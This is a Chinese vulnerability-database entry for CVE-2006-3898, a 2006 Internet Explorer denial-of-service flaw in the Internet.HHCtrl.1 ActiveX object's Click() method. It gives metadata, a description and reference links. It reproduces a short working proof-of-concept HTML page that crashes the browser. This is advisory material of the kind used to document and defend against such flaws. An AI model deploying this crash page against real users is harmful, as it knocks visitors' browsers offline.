Microsoft IE Internet.HHCtrl ActiveX对象Click()方法处理拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110660 漏洞类型 其他
发布时间 2006-07-22 更新时间 2006-08-28
CVE编号 CVE-2006-3898 CNNVD-ID CNNVD-200607-465
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/28256
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-465
|漏洞详情
MicrosoftInternetExplorer是微软发布的非常流行的WEB浏览器。InternetExplorer在处理某个的ActiveX对象时存在漏洞,远程攻击者可能利用此漏洞导致IE崩溃。InternetExplorer在未初始化URL时调用Internet.HHCtrl.1ActiveX对象的Click()方法触发空指针引用问题,可能导致IE崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/19109/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

<html><body><script>

// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject("Internet.HHCtrl.1");
	a.Click();
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>

</body></html>
|参考资料

来源:XF
名称:ie-hhctrl-dos(27929)
链接:http://xforce.iss.net/xforce/xfdb/27929
来源:BID
名称:19109
链接:http://www.securityfocus.com/bid/19109
来源:OSVDB
名称:27231
链接:http://www.osvdb.org/27231
来源:VUPEN
名称:ADV-2006-2952
链接:http://www.frsirt.com/english/advisories/2006/2952
来源:MISC
链接:http://browserfun.blogspot.com/2006/07/mobb-22-internethhctrl-click.html